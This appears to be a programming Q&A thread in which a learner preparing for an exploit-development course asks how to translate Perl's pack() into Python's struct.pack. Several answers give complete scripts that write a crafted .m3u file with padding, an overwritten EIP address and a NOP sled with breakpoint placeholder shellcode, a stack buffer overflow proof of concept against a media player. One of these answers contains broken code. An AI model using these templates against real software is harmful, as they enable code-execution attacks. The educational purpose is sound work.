10

I've been working on some exploit development recently to get ready for a training course, and I've run into a problem with a tutorial. I've been following along with all the tutorials I can find, using Python as opposed to the language the tutorials used, out of preference. I'm trying to crosscode everything, but I can't figure out how to crosscode Perl's Pack() function.

TL;DR: I'm trying to translate this to python:

my $file= "test1.m3u";
my $junk= "A" x 26094;
my $eip = pack('V',0x000ff730);  

my $shellcode = "\x90" x 25; 

$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25; 

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE)print "m3u File Created successfully\n";

I've found Python's struct.pack() function, but when I use 

Fuzzed.write(struct.pack('V', 0x773D10A4))

, it stops the program and doesn't work. What am I doing wrong?

This is my entire source code

import struct

Fuzzed = open('C:\Documents and Settings\Owner\Desktop\Fuzzed.m3u','w')
Fuzzed.write('A' * 26072)
string = str(struct.pack('V',0x773D10A4))
Fuzzed.write(string)
Fuzzed.write('C' * 3000)
Ethan Heilman
  • 16,347
  • 11
  • 61
  • 88
Schinza
  • 101
  • 1
  • 4

5 Answers5

11

Try using the "L<" pack template instead of "V". This should work in Perl and Python both. N and V are an older Perl method of specifying endianness, and < and > are the newer method. It looks like when Python borrowed pack from Perl it only took the newer, more flexible interface.

Edit: Python wants the < before the type specifier, while Perl wants it after. Not quite so compatible :(

hobbs
  • 223,387
  • 19
  • 210
  • 288
8

Python's struct.pack uses the first character for the endianess/size variation, and then one or more for the data type. Perl's V means 32bit unsigned int/little-endian.

The Python analogue is struct.pack('<I', 0x773D10A4).

phihag
  • 278,196
  • 72
  • 453
  • 469
2

i've already translated to python and i've already tried for MP3 converter. Here is your answer:

import sys
file = "8.m3u"
junk = "A"*26042
eip = "\X3A\XF2\XB5\X01" //0x01B5F23A
shellcode =" " 
shellcode += "\x90"*25
shellcode += "xcc"
shellcode += "\x90"*25
tmp = junk + eip + shellcode
D = open(file, 'w')
D.write(tmp)
D.close()
print "m3u File Created successfully\n"
aysebilgegunduz
  • 790
  • 12
  • 26
1

This is exactly what you want. how about the training course?

import struct 

file = 'crash.m3u'
junk = b'\x41' * 26091
eip = struct.pack('<I', 0x1d5f23a)
preshellcode = b'\xcc' * 4
shellcode = b'\x90' * 25 + b'\xcc'
fp = open(file, 'wb')
fp.write(junk + eip + preshellcode + shellcode)
fp.close()

import binascii
print binascii.hexlify(open(file, 'rb').read())

print 'm3u file is ready'
Nick X
  • 176
  • 1
  • 7
0

I was studying the same/similar tutorial. What fully worked for me is Nick's answer. I also tested the m3u file created on the vulnerable software. It really works, though my EIP address is different. I ran it using python 3.7.5 on linux machine. This is the modified code:

import struct

Fuzzed = open('Fuzzed.m3u','wb')
Fuzzed.write(b'A' * 26072)
string = struct.pack('<I',0x773D10A4)
Fuzzed.write(string)
Fuzzed.write(b'C' * 3000)

The reason why we need to convert everything to byte object is pack function returns a byte object and we cannot concatenate it with strings. Also str(struct.pack('<I',0x773D10A4)) doesn't work either. Instead of pack you could also use 0x773D10A4.to_bytes(4, 'little'). Another way is to manually rearrange the bytes:

string = b'\xA4' + b'\x10' + b'\x3D' + b'\x77'
jitheshKuyyalil
  • 31
  • 5